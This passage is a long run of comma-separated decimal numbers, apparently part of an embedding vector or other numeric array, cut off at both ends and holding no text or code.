008766269,-0.0024491395,-0.012750239,0.022542752,0.01921345,0.019643364,-0.0029435377,-0.011050907,-0.0087750405,0.006147093,0.0025366792,0.0075920266,0.007591093,0.01827875,-0.015883807,-0.0130639,-0.005683311,-0.013072042,0.0028981203,-0.015160017,-0.010500366,-0.0141008645,-0.0053483383,-0.017068973,0.009991175,-0.014160599,0.030783426,0.020741625,0.00044280302,0.026387116,0.011782714,-0.020389121,0.019573027,0.00652407,-0.026469111,-0.017292581,0.002400869,0.010467122,0.02594317,0.0027053026,-0.02649694,-0.025233025,-0.0055381963,0.005111394,0.00048908,-0.020877209,-0.012705917,-0.034974508,-0.0049461033,-0.014663188,-0.019420654,-0.0028827041,0.012509405,0.020750582,0.009800331,-0.0035902825,0.0028568208,0.031539716,-0.0100374175,-0.005470629,0.0011642899,-0.015040605,-0.0029554907,0.018890236,-0.0017169158,-0.0044395663,0.021208264,0.0071661123,0.026314175,-0.011480679,-0.01866798,-0.004308112,-0.0009797062,-0.008349281,0.007743212,0.001282829,-0.021736633,-0.021152956,-0.004337453,0.065944,0.0190207,0.029737819,-0.026899982,-0.008283694,0.017129742,-0.012056615,-0.0019882582,-0.017697444,-0.010402121,-0.011699606,0.026182134,0.012652088,0.012761434,0.0049168486,-0.028597448,0.016844008,0.004301488,-0.08533275,0.01997287,0.031088818,0.022916907,0.014948012,-0.017760519,0.0017358464,0.0052812602,-0.041317053,-0.024645805,-0.005969397,-0.010904734,0.0054867323,0.0106221335,-0.013299641,0.004067892,0.006056223,-0.020650588,-0.012126884,0.013669357,-0.012966073,0.01768375,0.0002165,0.014549884,0.003430104,-0.015847942,0.007598871,0.01997743,0.021786464,-0.02048281,0.011752439,0.042000838,0.01582719,-0.014044152,0.016868774,0.009669707,-0.0032118037,-0.013307865,0.031422537,-0.012143298,-0.016714176,0.016826253,-0.02378186,-0.0012945234,-0.007192405,0.0017234198,0.0037459985,-0.018986931,0.030186377,0.030020656,0.002653821,0.011928562,-0.04080783,-0.014887106,-0.025039239,-0.014849029,0.021900441,0.010536196,0.017312149,0.0115409205,-0.007830521,0.021456344,-0.0048323553,0.00008048971,0.009319979,0.00002232614,-0.020942396,0.00064441556,-0.038947117,-0.0021407888,0.0093296515,-0.0010417022,0.012675104,0.021593712,-0.0135940015,-0.009718883,0.0014298137,0.02174489,-0.0019046352,-0.018648015,-0.0080073485,-0.025796244,-0.0010574801,0.007626339,-0.017098926,-0.009412051,-0.01837044,0.009886744,-0.0053850124,-0.003661485,-0.0012181388,-0.01161581,0.05300674,0.009171076,0.009422681,-0.010091532,0.00021545464,-0.012804457,-0.0004260531,-0.0067864647,-0.002341402,-0.005570574,-0.009302572,-0.007357907,0.008549273,0.025315976,-0.020945478,0.004211799,-0.026784714,-0.013894898,0.0007566298,-0.0018939335,0.011689308,0.028125947,0.0040519815,-0.022976689,-0.007852205,0.02320955,0.018910745,0.00013128539,0.040535133,-0.02307379,0.019198399,0.0023501343,-0.0037530754,-0.015046259,0.011387154,0.009143677,0.013076971,0.000475198,-0.009004081,0.0020911598,0.0055935085,0.013016925,0.006005517,0.006731282,-0.01701014,-0.009538561,-0.030099332,-0.020860672,-0.00007687071,-0.000547842,-0.015683234,0.011587944,-0.014167983,0.03549317,-0.011312896,-0.002270456,0.014237034,0.076864794,0.007880684,0.012522489,-0.0040893466,-0.02122086,-0.0034439685,0.026428416,0.018669123,0.00092823734,0.0005307711,-0.010383627,-0.02875558,0.0013641432,0.0034531348,-0.0017165784,0.010732055,-0.009275627,-0.0015332531,-0.01229412,-0.011258761,0.019823084,-0.029570306,0.0024317764,0.030260058,-0.0027878336,0.01822752,0.0136653725,-0.004702814,-0.0030573378,-0.01971707,0.011758536,-0.008583432,-0.008691289,0.016916065,-0.03226252,0.005677166,0.008045183,0.022373484,-0.009780685,-0.0044589234,-0.0061514657,0.013153019,-0.007993161,-0.02793089,-0.0010464455,0.038542926,0.00014306212,-0.0011858732,-0.013257153,0.013008444,0.0008842577,0.014032799,-0.026713302,0.013065416,0.0009781006,0.021533327,0.021029016,-0.04879756,0.042665,0.010708405,0.0021654582,0.025170917,0.00024242944,0.014333671,-0.000014927671,0.019207885,-0.010509356,0.0022677844,-0.017297147,0.0057895235,-0.0023968208,-0.00969671,0.00081968005,0.013388843,-0.0108243795,0.017875947,0.0033855299,0.0059532896,-0.0051497617,0.012694146,-0.024069894,0.0007031949,0.0031112526,-0.012084949,0.0021892935,-0.0035196731,0.0073632984,0.0207999,0.016297758,0.0035502228,-0.020843882,0.0074645937,0.0033705444,0.0015514625,0.02339655,0.006151839,0.0055153635,0.01847653,-0.013341135,0.017031293,0.0021017068,-0.0055204723,0.0031034206,-0.024563005,0.007589864,0.00037689536,0.010930008,-0.011766087,0.0031410845,0.022539439,-0.014436275,0.0114843175,0.008835455,-0.012158868,0.0005697453,-0.024210026,-0.02224219,-0.018473305,-0.02082831,-0.017151427,0.020855205,0.007733866,0.010975878,0.013103516,-0.02845377,0.01718444,-0.014961073,0.00077024545,0.015514717,0.027886325,-0.0039005242,0.019248635,0.002927485,-0.043369595,0.01807151,0.009462498,-0.00923582,-0.040951606,0.010379254,0.005000945,0.021754194,0.027806543,0.036486235,-0.011211657,0.0080416,0.021043647,0.03150711,0.0023800572,-0.004116202,-0.013532561,-0.006294557,0.009923531,-0.0021472739,0.00040146033,0.010625213,0.013442437,0.013997131,-0.021636195,-0.02719502,-0.007208438,0.022654584,-0.026175577,0.01334934,0.0019771995,-0.010343107,0.013634079,0.009440239,0.068321474,-0.0015874461,-0.01252791,0.012196275,0.012899978,0.006005474,-0.014717638,0.025598872,-0.031892773,-0.022079105,0.002994612,0.023835452,0.0037910237,0.020022709,0.010298091,-0.012600082,-0.009667768,0.019398266,-0.009853381,0.0013443195,-0.004709228,-6.1399e-7,-0.017688397,-0.008915205,-0.011416485,0.01059675,0.03132548,-0.0013209151,-0.0318226,-0.033762112,-0.024883661,0.0009251432,-0.00135459,-0.007250236,-0.006025528,0.027718905,0.0021608819,-0.02149573,-0.012752049,0.03305751,-0.024615593,-0.010369856,-0.0034878314,0.005195277,0.006380825,-0.010149235,0.009067519,0.020137941,0.020956287,0.0027743683,0.000020293795,0.009550379,0.023907209,0.024723733,-0.015455866,-0.002451528,0.024002105,0.00969398,-0.00080723164,-0.0051317913,-0.0031103913,-0.0015034904,-0.030831441,-0.001665413,-0.0075429142,-0.000010204398,0.011567228,0.00039394738,0.0019718662,-0.028744452,-0.000899035,0.009663015,0.0019884764,-0.011605036,0.018050604,0.012461509,-0.003891139,0.007815788,0.014007628,-0.015891459,-0.022662617,-0.0015286914,-0.00028660314,-0.0151280295,0.017631937,0.0054115984,0.010713641,-0.006612552,0.009202827,-0.019969972,0.0035130675,-0.006048489,0.01814545,0.014779691,0.012528873,0.019723991,0.010148259,-0.016063413,0.00091906165,0.010594906,-0.034167655,0.01614326,-0.011202626,0.04387938,-0.01173665,-0.010637288,0.006247453,-0.013680085,-0.012119962,-0.024455352,0.01360872,-0.041892227,-0.008336957,0.0042078467,0.0040063746,-0.019660287,0.029835116,0.022697812,0.003543166,0.0014526454,-0.006901466,-0.011946434,0.004467836,-0.012219854,0.00052713294,0.010199766,-0.0023620164,-0.036932133,-0.018161241,-0.027874626,-0.028402299,-0.015669597,0.043739047,-0.009328174,0.0048393137,0.017980175,0.007830335,0.0012840021,-0.01139653,0.0075805397,-0.034561485,0.0081902,0.0077937236,0.0069390913,0.0064766873,-0.006217585,-0.0009455305,-0.014291965,-0.010602529,0.0040123328,0.011535747,0.0026431698,-0.026057871,-0.007095224,0.009602375,-0.019850384,0.005369112,-0.023835398,0.008227796,0.00436111,0.038852334,0.0011846542,-0.0006351578,-0.006175252,0.0108689135,-0.008931709,0.012591166,0.01147406,0.024039024,-0.0046031997,0.012095954,-0.0042524925,0.007302348,-0.002869319,-0.014124684,0.003923012,0.02445133,0.041831173,0.005428807,0.019452302,-0.008228053,0.015715934,0.016753357,0.0025016991,-0.0064721587,0.02702283,-0.00180626,0.013919697,0.007887662,0.022251228,0.012424544,-0.023937918,-0.012316883,-0.011624907,0.026568655,0.023337476,-0.0016650226,0.0034045076,-0.00068337796,-0.005590747,0.0092196185,-0.019006422,-0.00860637,0.008470537,0.0010728813,0.013320542,-0.029109081,-0.007114129,-0.031415027,-0.0025970933,0.013372907,0.010888205,0.0049162135,-0.0029985965,-0.009233556,0.013215788,-0.0038898182,-0.021130059,-0.03139495,0.00026265474,0.021181462,-0.047454998,0.006651176,0.021587148,-0.017165463,0.009474859,0.016012143,-0.022196991,-0.0052809664,-0.014172305,-0.011778118,0.020829994,0.01580117,-0.0022325516,-0.00067095313,-0.011353966,-0.012253901,-0.011361611,0.001478332,-0.00007188479,0.0019918059,-0.0035960344,-0.0028985222,-0.006844257,0.0048537087,-0.018809585,-0.0147654,0.0023654394,-0.01951656,-0.020404115,-0.026212132,0.03070064,0.003832878,0.015841687,-0.015592284,0.020537358,0.04273908,-0.00909799,0.0082609365,-0.014332697,0.000073264,0.026499793,0.019850416,-0.0045429114,-0.016135275,0.008632365,0.0121157225,-0.025139434,0.01105545,-0.0024355669,-0.009997968,-0.018141376,-0.02243797,0.00511835,-0.025648583,-0.00054919213,-0.0037666124,-0.022875061,0.023721416,-0.016013833,0.011317124,0.01422154,-0.014815149,-0.0012993066,0.013882368,0.023027416,-0.031009471,-0.027885728,0.008825813,0.00064914086,0.010442911,-0.0011883299,-0.022382054,-0.025924204,-0.031854115,0.0193285,-0.011286877,0.0061667664,-0.0060401345,-0.015937407,-0.015626227,0.014706847,0.006353192,-0.00017312853,-0.031758737,0.0045937686,-0.0033812374,-0.01242792,0.031269584,0.039987728,-0.0102855805,0.0052975547,0.013018995,-0.022901189,0.0042172796,-0.01555291,0.015336123,-0.019258635,0.008799456,0.010248623,-0.016845997,0.0013622547,-0.011292606,0.005880226,0.036788072,0.008115265,0.007406543,0.006681949,-0.029548312,-0.0007689127,-0.020114748,0.011529509,-0.012368153,0.019248646,-0.005061673,-0.011280999,-0.003966067,-0.010066334,0.04430912,0.008096297,0.012880795,0.009891683,-0.016760161,-0.022676498,-0.012564904,-0.0068551763,-0.0028295526,0.010827258,0.007794367,0.0115000205,0.00978189,0.026024763,-0.0005150949,-0.022881372,0.004373866,-0.004540693,0.005558821,0.018594379,-0.010669802,-0.00979288,-0.015215579,0.02863797,-0.02703114,-0.029493764,-0.0035730065,-0.0069658277,0.028694043,-0.012339396,-0.0040345346,0.00013678838,-0.00006603619,0.013937632,0.004167069,0.006222779,-0.02265357,0.009794999,0.0023466446,-0.0027437988,-0.002179565,-0.004795772,-0.008534356,0.00898475,0.0049118088,-0.0045036552,0.026413755,-0.019508166,-0.00009258072,0.014132933,-0.0030664636,0.006153233,-0.0054340996,-0.013505682,0.026627311,0.02669444,-0.0076926546,0.008009065,-0.03248086,-0.021845715,0.00045405392,-0.009416002,-0.025685335,-0.027088277,-0.000041619747,0.016630707,-0.0050804424,0.001848571,-0.018506277,-0.09820239,0.024118152,-0.0014963922,-0.006359366,0.009406841,0.011980436,0.011876273,0.032161552,0.03993159,-0.0033748336,0.016657505,0.009883537,0.014889409,-0.00192266,0.005753337,-0.014548509,-0.03828146,-0.016045293,0.027683765,0.0053982604,0.002913826,-0.0072972565,0.003916936,-0.0096999435,0.046073493,0.009998315,-0.010073766,-0.02414852,-0.021383813,0.021013873,-0.0057268576,0.00224793,-0.005564454,0.001454496,-0.012125012,-0.024789013,0.00981186,0.012527516,-0.009297787,-0.004050727,-0.0021301606,-0.024283437,-0.009163318,0.028603328,-0.01659556,-0.033543672,0.0076516247,-0.013412753,-0.0037757063,-0.022817316,0.03342705,-0.0027939829,-0.0051981444,0.025210526,-0.011965361,0.012705998,0.0078577185,0.0155637385,0.01597287,-0.0011391424,0.021874687,0.00953176,0.0153961815,-0.01742135,-0.040810768,-0.0006227633,-0.0060452865,0.033987973,-0.013412979,-0.014320485,-0.0006115176,-0.01374858,-0.018437965,0.014363839,-0.026631713,0.007550342,0.002762823,-0.012008128,-0.0043814927,-0.014546298,-0.010374966,0.027086683,-0.0026209175,-0.00217718,-0.017285192,-0.020797329,-0.0035114319,0.011339992,0.010707541,-0.024501065,-0.0006533185,0.0026248088,-0.023991423,0.007255879,0.009947736,0.02667305,-0.00044085403,-0.009957434,0.009746371,-0.014982405,0.007987619,-0.0041717007,-0.0069221198,0.031186529,0.0032747888,0.0008008028,0.003270131,0.018612165,0.013593255,0.024674982,0.009773065,-0.005779499,-0.008929488,0.02032756,0.0054395013,0.018813802,-0.00813055,-0.010654558,0.025139946,0.029048298,0.0114121605,-0.0011242294,0.03448277,0.00045064508,-0.002776505,0.0077648982,0.0073202993,0.0076375543,-0.0075966897,0.0049363673,0.0040796516,0.011393383,0.00054355734,-0.009407076,-0.0073275524,0.01286158,-0.0017377796,-0.019637166,-0.021971615,-0.0001223261,-0.03994496,0.024232695,-0.00022162659,0.0054546325,0.0101266755,-0.00703873,0.015954101,0.009441118,-0.000876659,0.016924432,0.0059697223,0.011297072,0.011434812,0.018402606,0.00023462802,0.025486605,0.0033220586,-0.026905635,-0.0021137786,0.0144438315,0.0041321823,0.0025685225,0.0018278423,0.0033274973,-0.030470604,0.0090125045,-0.0030510237,-0.003198399,-0.008415711,-0.0036195614,0.008636545,0.016768288,0.0045755045,0.030757677,0.026314711,-0.024224041,0.0111149205,-0.0144935595,-0.0055852616,-0.00789629,0.0038929174,0.05627564,0.016253559,-0.007683299,0.02744951,-0.0015881001,-0.0021712284,-0.0013085023,-0.010984153,-0.0152655495,-0.016180778,-0.0063618855,0.011526469,-0.009763673,-0.01948039,0.035760637,-0.0003770347,0.019889442,0.008839335,-0.0036915755,-0.0029703933,0.03397771,0.018478433,-0.0057447734,-0.018704392,0.008058777,0.009505372,-0.017252868,-0.016084226,-0.0075904196,0.0011015361,-0.0058285417,0.007903406,-0.006567203,-0.0250258,-0.00072097563,-0.024354499,0.0005207154,0.018698413,-0.009082616,0.004982897,0.032243416,-0.0016457657,-0.004105804,-0.006241715,-0.018482305,-0.0071109277,0.005251448,-0.008835175,0.0018450599,0.024049638,0.0003806231,0.011105573,0.008020257,-0.01647266,0.010161153,-0.013117778,-0.007847632,-0.01988008,-0.015867611,0.012445182,0.004987962,-0.0149770165,-0.0052365735,-0.0021875985,0.046275206,-0.014837227,-0.007232132,0.003247728,-0.0013001941,0.00040682763,0.017809123,0.016408917,0.023926524,-0.01656677,0.00037533673,-0.011242709,-0.0014757592,0.009650297,0.0016301941,-0.003786132,-0.008738424,-0.0022598864,-0.010816852,0.004774721,-0.00890455,-0.024351781,0.026987687,0.026666129,-0.004537976,0.0040465905,-0.002260462,-0.014330364,0.020500712,0.018811282,0.022359278,-0.013580393,-0.029178547,0.0036057562,0.027779993,0.01870671,0.00071254425,-0.0035287435,-0.021819856,0.0067483927,0.01915723,0.02295216,-0.021512898,0.013602616,-0.0032691648,-0.006914478,-0.012863162,-0.0019052454,0.010162325,-0.00033929525,0.011149771,-0.0083128,-0.010986204,-0.007904311,-0.015750892,0.08017705,-0.042291485,0.0051337746,-0.0028357639,0.019722894,-0.02093772,0.020610053,0.0065705013,0.017687224,-0.0037896992,-0.01810007,-0.016765593,-0.024245396,0.0042838445,0.008970984,-0.015055561,0.005513863,0.027277565,-0.0067754714,0.030965585,-0.0026570333,0.010508435,-0.010881078,0.012392818,0.003390847,0.0146641685,0.031340577,-0.03222458,0.015344996,0.008694222,-0.0028735606,-0.022118872,0.028227137,0.029651398,-0.009765938,0.0046567614,0.009276996,-0.02092114,-0.014143996,0.017232552,-0.021729182,-0.018711498,0.04192353,-0.0027498119,-0.008255548,-0.011230472,-0.0053864354,-0.017454136,0.007132828,-0.008982793,0.005034609,0.0034425324,-0.0025516374,0.001669602,-0.02615566,0.027574187,0.0017892629,0.018910112,0.012741028,0.0040874383,0.0054235384,-0.0068463753,-0.009251369,-0.028936716,-0.018954508,-0.002571377,0.0070099337,-0.01210696,-0.00071171613,-0.011367268,0.009114344,0.00012102301,0.0030147864,0.0024664851,-0.0064819264,0.009738711,0.033266097,-0.021659754,-0.0111065265,-0.019092165,-0.004904241,-0.010372099,0.03198919,-0.00058629457,-0.004615183,0.0034727028,-0.00035737967,0.002961985,0.05073528,0.0018961693,0.018971689,-0.012146909,-0.016203307,0.027350327,0.031113334,0.0204656,-0.0047497265,0.007329638,-0.02146621,0.033635262,-0.012915234,0.009110579,0.026382906,-0.015105236,-0.00087510946,-0.0033258104,-0.0035916653,-0.0010257703,-0.0053649135,0.03748135,0.01969448,-0.0010923858,-0.0011829868,0.0073873536,-0.00017026889,0.005961843,0.01225727,-0.009656171,-0.017370982,0.011561275,0.0013362141,-0.016717687,0.010081645,-0.04892356,0.01790121,0.19237931,0.0064768963,0.0079873055,0.008945772,-0.012612106,0.005122007,-0.1396737,0.0037771186,0.01174371,-0.0037677733,0.007974874,-0.005569379,-0.017370444,0.008848453,0.01208129,0.012905977,-0.0058788364,-0.010489257,0.019578485,-0.01268319,-0.014706555,0.0043360014,0.00020249774,0.0061953412,-0.019983236,-0.009220069,0.016682023,-0.020869229,-0.0034816985,-0.011021116,0.0141208405,-0.0038291956,0.018317163,0.005356221,0.0014470943,0.0071474807,0.02388149,0.010734163,-0.019863203,-0.00071524864,0.026174022,0.0027024015,-0.027327638,-0.033641152,-0.15518817,0.008929214,0.009671984,-0.0485481,0.0050864746,-0.0042872853,-0.0059974412,0.0020120866,0.006458714,-0.02995273,-0.0037887157,0.024867134,0.006290475,0.0025265887,-0.01078167,-0.028189758,0.014787547,0.0022155899,0.0012921384,0.0021374256,0.012106354,0.0095050065,-0.017428005,-0.014442469,-0.02252438,-0.00281456,-0.008180494,0.026160782,-0.0011756252,0.0072987787,-0.005217945,0.018351648,-0.014883658,0.0056369402,-0.007092096,-0.0027577493,0.008975248,0.0012697597,-0.0236463,0.0083054,-0.0001865765,-0.0076560536,0.0028811079,0.0045966925,0.009121716,0.0012634132,-0.006423167,-0.006683299,-0.005407261,-0.0031401447,0.011027291,0.0036726973,-0.011723196,0.019619696,0.023053795,-0.0003044731,-0.0023662003,-0.03132561,-0.014976022,0.005660712,-0.0038437624,-0.019718107,-0.011085437,-0.01445115,0.030506402,-0.02376654,0.01114524,-0.011054457,-0.003191764,0.013841219,-0.011328434,0.009664708,-0.0070727626,-0.028574547,0.014777139,0.013806337,0.005317728,-0.0088544255,0.012127437,-0.024986923,-0.00028365842,0.0033544814,0.0048838584,-0.03038465,-0.0062260875,-0.023014568,0.006235123,-0.009531396,0.005754803,-0.0031983797,0.023372397,-0.0113080805,0.021148581,-0.0009801503,0.025561046,0.0007110248,0.038086798,-0.02072028,-0.0068009286,0.023604408,0.0013938482,-0.0021632912,0.004421777,-0.020061752,-0.012128722,-0.0009801032,-0.013183537,-0.0116228415,-0.028662866,-0.020565214,-0.023944529,-0.007369326,0.028759988,0.0038558936,-0.029352792,-0.016122282,0.012031431,-0.00995568,0.013755467,0.014554669,-0.03385648,0.0096301725,-0.0073978817,0.0012790425,0.03357202,0.0019428065,-0.011330371,-0.015633874,-0.01010148,0.022746285,-0.024380498,0.010966498,0.0021478448,0.012781409,-0.0027092271,-0.0005403201,-0.011333533,-0.022537025,-0.003684962,-0.0046748114,-0.0057917205,0.0068846303,-0.014454149,-0.0112092085,0.011762684,-0.008872923,0.03812817,-0.013065685,0.018442748,0.0038069237,0.010910326,0.020404762,-0.01613149,-0.019643676,0.002247088,0.07328853,-0.007999404,-0.022860184,0.024893168,-0.012799678,0.023565307,0.02366994,-0.02178381,-0.021851068,-0.037175313,-0.010008894,-0.008183337,-0.0033038638,0.019765347,-0.017413247,0.009662807,0.025017112,0.0018061614,-0.0030907814,-0.0028843319,0.027577575,-0.007713551,-0.013982781,0.026982622,-0.0041255825,0.015774965,0.010259505,0.002559898,-0.017839802,-0.009131465,-0.03365574,-0.014414916,-0.00037440928,0.0020187467,0.00086751406,-0.046369888,-0.003795628,-0.0013460917,0.028500816,-0.015279712,-0.0028742482,0.010792468,0.010809362,-0.027620226,-0.017766794,-0.024747275,-0.01681514,0.0054473653,0.010453127,-0.020528901,0.009374207,0.012256504,-0.0024319077,0.012745187,0.014092384,0.001987378,0.0050539104,0.004924707,-0.014149424,-0.011730169,0.027998902,-0.019975347,-0.004143863,0.003258,-0.023074597,-0.0059745247,-0.007927829,0.00034212339,-0.0022541159,0.01857837,0.004026106,-0.014309608,-0.023285037,0.0047009094,-0.003804315,0.0050338926,-0.009646362,-0.0023914976,-0.0025324307,0.013850622,0.0038379114,0.018258639,0.0044421796,-0.0030455752,-0.0048476798,-0.037262864,-0.01958305,0.052097365,0.008674726,0.013172966,0.005399773,-0.00044975296,0.02990057,0.00039115755,-0.013614279,0.0097742835,-0.0020647512,0.00627685,-0.0005631329,0.018766161,0.03312118,0.010699703,-0.006371755,-0.00586175,0.008641474,-0.0017001227,-0.012638883,0.02046032,0.0028422766,0.000961792,0.02538593,-0.02197554,-0.009111245,-0.015256714,-0.008678053,0.048260972,-0.011888562,0.024967901,0.0145319775,-0.011364613,-0.026827697,-0.0004970427,-0.0013586789,-0.021116758,0.026589517,-0.026778897,0.0031264585,0.0018221091,-0.027907718,0.01094346,-0.00532733,0.019700374,0.0306456,-0.0065064104,-0.019000387,-0.0034215392,0.011268751,0.004915008,-0.015738385,0.020864332,-0.008850723,0.0084181735,0.0011529771,-0.00516509,-0.014144773,0.0030600883,0.014283442,0.0005110658,-0.024716685,0.015788756,-0.008883567,0.0030542458,-0.019170327,-0.001774602,0.009546866,0.003677756,-0.0052894843,0.009653228,-0.024485873,-0.0006209604,-0.0005137507,0.033068504,-0.00852084,-0.012034114,-0.011813829,0.016735995,0.027503071,0.0033477086,0.017993113,0.002072985,0.005671093,-0.009185809,-0.007647949,-0.0022808337,-0.008292882,-0.011661379,-0.0017920483,0.00872821,-0.009271702,-0.00096919,0.017511997,0.0071990164,-0.005838173,-0.010746923,0.00004873123,0.009497723,-0.00039377128,0.040731926,-0.011745937,0.00093919,0.005302586,0.01802477,-0.006383642,0.023854235,-0.061286844,-0.00045309623,0.004372602,0.0071011866,0.023010159,0.015711902,0.0053480007,0.007992479,-0.0126322,-0.0059870286,0.03045674,-0.013581541,-0.01052921,-0.022199623,-0.011895461,0.0034882831,-0.0029111204,-0.0045823585,-0.01700522,-0.0027270932,0.008613377,-0.008793661,-0.011502107,0.01813904,-0.0054958826,-0.020314457,-0.0064412947,0.016920108,0.013750641,0.010945579,0.0054413946,-0.007163972,-0.0059685954,0.046160236,-0.023809576,0.0002834245,-0.007295417,0.03849465,-0.010035529,-0.013071639,-0.017468566,-0.022613667,-0.020757481,-0.005546589,-0.020383885,0.014110528,-0.0073323776,-0.033777952,-0.0199535,0.016534016,-0.00037195376,0.008914572,-0.007093836,-0.004096879,0.0000445412,0.0073411237,-0.007437685,-0.016234972,-0.035333045,-0.0047787447,-0.00040777624,-0.015612018,-0.0037293911,-0.0023262403,-0.024617827,-0.012428863,-0.009823658,-0.021939976,-0.013495609,0.0007878442,-0.00042512314,0.0046680933,-0.017669339,0.019257043,0.013088796,-0.0066049243,0.00050625275,0.004446989,-0.009190885,0.008035678,-0.012460791,0.00205658,0.006990805,-0.019903954,-0.001934307,0.027290544,0.012132109,-0.023931997,0.018589282,0.014432234,-0.002715035,-0.021181766,0.0101689305,0.012107027,-0.011345721,-0.020089312,-0.01618949,0.025377437,0.00006631384,-0.0035861104,-0.0013452414,-0.006461426,-0.0071108714,-0.025294082,0.00006568033,-0.0032087306,-0.0024680325,0.01305877,-0.019941336,0.01768678,-0.003290363,0.00648868,0.029511753,0.0009230826,0.006585743,0.002125355,-0.01774483,0.008601183,0.020853795,-0.005967467,0.02693299,0.009635621,0.017366024,0.037170894,-0.016212724,-0.0043495623,-0.0024398444,-0.010916349,0.0018099742,-0.010914552,-0.01745891,0.0036723875,-0.02194979,-0.03069106,-0.011967909,-0.003814839,-0.019295735,-0.014807042,-0.0016354873,-0.14621182,0.00030602748,-0.018801052,0.0138813555,-0.008823026,-0.012725385,-0.0020374518,0.02509896,0.0029930382,-0.00999589,-0.016608316,0.041743428,-0.009536185,0.0045134365,-0.0026149289,0.0008430759,-0.048515268,0.0024882494,-0.01362916,0.010115486,0.017172558,-0.027587652,-0.018274153,0.009680536,0.0016910897,0.001833638,-0.00911958,0.024292234,0.015367642,0.010584424,-0.02070593,-0.012023376,0.017388456,0.011197944,-0.00090406724,0.0047283173,0.0017030468,-0.0077897687,0.006812455,0.010490766,-0.0045107496,-0.005663266,0.021929309,-0.005780348,0.0043527773,-0.008505243,-0.009207602,0.02233049,0.027089974,0.033053245,0.0016409371,0.007988966,0.009519294,0.0055173845,0.00029601142,-0.025144573,-0.0014695196,-0.009329831,-0.006613069,0.009351296,-0.01529056,0.020178676,0.011725923,-0.00023836005,0.0027939058,0.025790151,-0.009796849,0.0010762771,-0.009783189,-0.018362429,0.0038380018,0.029477643,-0.009914298,-0.007886826,0.005033631,0.013956898,0.013427357,0.003432791,-0.030403838,0.03831162,-0.0107406415,-0.009076137,-0.0075549977,0.027189545,-0.02387386,-0.025868079,0.0040328326,0.025792494,0.006541909,0.022089778,-0.013820964,0.010344292,-0.009828956,-0.016513696,-0.007415229,0.009611314,-0.003738216,-0.01264572,0.0005693112,0.009405168,-0.012075251,0.005215672,-0.0040086173,-0.013543886,-0.14546147,-0.008970292,0.008705094,0.015453774,-0.012368522,-0.018261123,0.023943042,0.003887636,0.024405506,0.012719459,-0.0019138578,0.016213002,-0.018204262,0.0034605216,0.019974476,-0.002959031,-0.026642215,0.016100992,-0.002289444,-0.013220887,0.010684794,-0.011744672,0.0043846606,0.021647824,0.0033216288,0.021435438,-0.019463379,0.03436839,0.027763328,-0.0011238975,0.0033838241,0.006791497,-0.016331749,0.010545094,-0.031209342,-0.0048509906,0.01301136,-0.0071389717,-0.005598313,0.022137176,0.0020202529,0.014948847,0.024955884,0.011545266,0.0005093859,-0.0036276248,-0.012327776,0.025876317,0.0062475144,-0.0020253772,0.012752038,-0.0026276347,-0.020458931,-0.001088116,-0.015238289,-0.012271994,-0.0038341281,0.0074667684,0.0048592184,0.007886164,-0.004309856,0.000962357,-0.03060723,0.010016274,0.002639652,0.005142424,-0.01643679,0.0123241,-0.030219883,-0.002895531,-0.0040349388,0.028605107,0.009173774,-0.00934137,0.028556472,0.0043021413,-0.0035365694,0.025633961,0.017149394,0.0050344323,0.008654484,-0.0393366,-0.005394763,0.0031792233,-0.026234241,0.020045849,0.0024804913,0.012503857,-0.01230871,0.0025515468,0.02352008,-0.00013450252,-0.01910559,0.012418844,0.02276928,0.013108913,0.05062072,0.005706515,-0.03264247,-0.019993536,-0.00511896,-0.012209861,-0.010151372,0.0038648876,-0.021079024,0.025960498,0.016340574,0.013572971,0.0074579185,0.0061217495,-0.011762962,0.02719033,-0.023250246,-0.007018526,-0.0023169413,0.004284044,-0.010247419,0.007831868,0.00005242665,-0.0028217945,0.0061165146,0.0013465843,-0.003442494,-0.011014878,0.0020669461,-0.004571253,-0.007987406,0.026345726,0.013667929,-0.008504998,-0.0020175257,0.014218285,0.014580879,-0.0033961374,-0.0012100375,0.007436325,-0.0054564364,0.017495146,0.015625464,-0.003235535,0.016951108,0.0019707102,0.011040422,0.00022233602,0.0084163295,-0.00073151645,-0.00006071712,0.020171195,-0.00047949664,0.009314571,0.0008376965,-0.021078102,0.015053242,0.009224974,0.005713809,0.00955665,-0.010598576,-0.010611987,0.0074916896,0.019240398,-0.0031203716,0.027483912,0.028509794,-0.013344374,-0.007937626,0.008420854,-0.014186831,0.007594929,-0.008219742,0.022131987,0.005440103,0.0012376509,0.009993262,-0.046557557,0.013048091,0.013908979,0.011923597,0.0142917335,0.030126795,0.019956863,-0.0055326386,0.0124912495,-0.005155089,-0.017384991,0.006379073,0.01682247,-0.003432135,-0.007537699,-0.018511327,-0.010766863,0.02751637,0.013241616,0.00019379704,-0.033734493,0.005550614,0.0038896508,0.007819712,0.015816392,0.008871863,-0.010104472,-0.015898092,-0.007750958,-0.010648851,-0.01827479,0.0061542494,-0.012874954,0.002493745,0.015374755,-0.0035964316,-0.0062601944,-0.006414504,0.008101285,0.008360778,-0.005892715,0.009832446,0.0061503504,-0.010623003,-0.012867683,0.021509254,0.013662456,-0.013414727,-0.024075719,0.0076297955,-0.024627337,0.01204167,0.014635427,0.039697018,0.017754585,-0.008746529,-0.014761768,-0.004303196,-0.0025923091,-0.028129322,-0.0012837688,0.020431126,0.014612981,0.0067610065,0.0013652883,-0.021938493,-0.0061310283,0.029474884,0.019782867,0.016007451,0.03957112,0.008035121,0.002874317,-0.009495791,0.010330691,0.0121248,0.027626956,0.010043022,-0.010332004,-0.0011651485,-0.009403591,0.014962148,0.010492843,0.012364959,0.014163619,0.0038132996,0.0104506025,-0.025541855,-0.0008473762,-0.0064730584,-0.016696602,-0.003371867,-0.026040263,-0.018910829,-0.009716329,0.000450852,-0.0071866876,-0.014179882,0.008207368,-0.0090966225,0.013085052,-0.027413482,-0.009057222,-0.035370078,0.02152907,0.009240392,0.019084096,0.017969398,-0.006993192,-0.0029405067,0.022697343,-0.017393896,0.0049527814,-0.00033529178,0.0154487565,-0.0033428937,-0.0089486735,0.00875578,-0.018824931,-0.0007039779,0.006087709,-0.029008009,0.009406106,0.03305814,0.0069279545,-0.021199122,0.010741068,0.0006153248,-0.01989773,0.0029426056,-0.0065589095,-0.0041487366,0.011043725,0.007239136,0.011220555,0.0012650577,-0.004047766,-0.0062075797,0.0072262515,-0.009288946,0.031696428,0.01357622,-0.012839472,0.0036915652,-0.00627479,-0.046484955,-0.01087453,-0.0025122208,-0.004627777,0.010143345,-0.020814544,0.010585968,0.0059821126,0.004475938,0.015099115,-0.023711063,-0.017891286,0.022841757,-0.